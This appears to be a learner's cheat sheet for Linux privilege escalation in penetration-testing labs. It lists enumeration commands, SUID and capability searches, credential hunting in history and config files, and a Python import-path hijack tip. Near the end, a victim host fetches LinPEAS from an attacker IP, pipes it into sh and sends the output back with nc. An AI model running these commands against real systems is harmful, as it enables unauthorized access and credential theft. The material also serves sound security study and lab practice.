Starter

Some shells are “dumb” and don’t allow job control or proper signal handling. Upgrading to a TTY allows for Ctrl+C, arrow keys, tab completion, and better interactivity:

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

This just fixes the shell and lets u use clear (It tells the shell what kind of terminal is being used)

export TERM=xterm

Privilege Escalation (OS, Kernel, Services)

Check the OS version and kernel. Knowing this helps identify vulnerabilities or misconfigurations specific to the OS/kernel:

uname -a

Info about the Linux Distro

cat /etc/lsb-release

Info about the Linux Distro (All distros and more info)

cat /etc/os-release

Check what version of sudo is running

sudo -V

Check what commands I can run with sudo without needing a password

sudo -l

Create a list of all currently installed packages

apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list

Shows Binaries on the system

ls -l /bin /usr/bin/ /usr/sbin/

Files that a user can execute as root without passwords (with the setuid bit set to s)

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Lists all root-owned files with setuid and setgid bits, which run with elevated privileges when executed.

find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

Get capabilities (individual sudo permissions an app can run) from all apps

find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

Checks if any packages on GTFOBins are installed on the system (THIS IS GOOD)

for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done

Scheduled tasks that run as root may be vulnerable if you can modify scripts:

ls -la /etc/cron.daily/

Processes running as root can indicate privilege escalation opportunities:

ps aux | grep root

Who is logged in and what they are running can help find active users, shells, or processes to target:

ps au

System Info & Environment

Check environment variables (might have a password or smthn)

env

IDK what this does yet, they didnt explain

echo $PATH

Check the shells that exist on the system

cat /etc/shells

Find user login shells in /etc/passwd

grep "sh$" /etc/passwd

Check what groups are on the system

cat /etc/group

List members of any group on the system

getent group sudo

Check when a user last logged in

lastlog

Check who else is logged in

Files, Configs & Credential Hunting

User home directories may contain sensitive information (SSH keys, scripts, credentials). Accessing these can help in lateral movement or privilege escalation.

Users often leave sensitive commands in their history, like sudo commands or credentials:

history

Look for all (reasonable) config files on a system

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

Find all configuration files

find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null

Find scripts on the system

find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"

Find all hidden files on a system

find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null

Find all hidden directories

find / -type d -name ".*" -ls 2>/dev/null

View all temporary files

ls -l /tmp /var/tmp /dev/shm

Finding history files

find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null

Lists the commands of all processes running on the system

find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"

Find world writable files on a system (useful for finding cron scripts to edit)

find / -path /proc -prune -o -type f -perm -o+w -exec ls -lda {} \; 2>/dev/null

Find writable directories (potential for dropping scripts or escalating privileges):

find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

Networking

check what out interfacing are saying

ip a

Check what other networks are accessible

route

Check DNS configuration (Might contain Active Directory information)

cat /etc/resolv.conf

See if there is anything in /etc/hosts

cat /etc/hosts

Check what other hosts the target as been talking too

arp -a

Python Priv Esc

Check permissions for any files that are run (both the running file and the module it calls)

You can change the main module file if you have permission
Or you can run this and check if the module has a low priority (the order of the output is the order python checks to import a file so if u can place it above it will call your code)

python3 -c 'import sys; print("\n".join(sys.path))'

Running LinPEAS and Outputting to Host Machine

Download LinPEAS:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh

Start a simple HTTP server on your host to serve the file:

python -m http.server

Listen on your host machine to capture LinPEAS output:

nc -lvnp 9002 | tee linpeas.out

On the victim machine, fetch and run LinPEAS, and pipe output back to your host:

curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002

Misc (IDK where to put them)

They say to check for these (IDK where to put this other than misc)

Checks the dependencies for a custom dynamic library

ldd <applicaiton>

grep -RIn –color=always -I -E ‘password

passwd

pass(word)?

pwd

secret

api[_-]?key

token’ .